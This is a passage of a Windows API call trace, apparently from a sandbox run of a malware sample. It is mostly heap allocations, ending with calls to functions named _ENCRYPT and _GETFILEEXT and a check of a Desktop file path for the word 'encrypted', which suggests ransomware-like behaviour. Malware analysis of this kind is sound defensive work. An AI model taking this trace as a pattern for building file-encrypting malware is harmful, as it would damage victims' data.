HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf") returned 80 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.963] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.963] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.964] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.964] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.965] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0030.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.966] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0030.966] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.967] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0030.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.967] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.968] CloseHandle (hObject=0x140) returned 1 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.968] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.968] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.969] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.969] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.969] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.969] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0xa6e56f60, ftLastWriteTime.dwHighDateTime=0x1d5ba03, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0x7c20c0 [0030.969] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0xa6e56f60, ftLastWriteTime.dwHighDateTime=0x1d5ba03, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0x7c20c0 [0030.969] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.969] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS 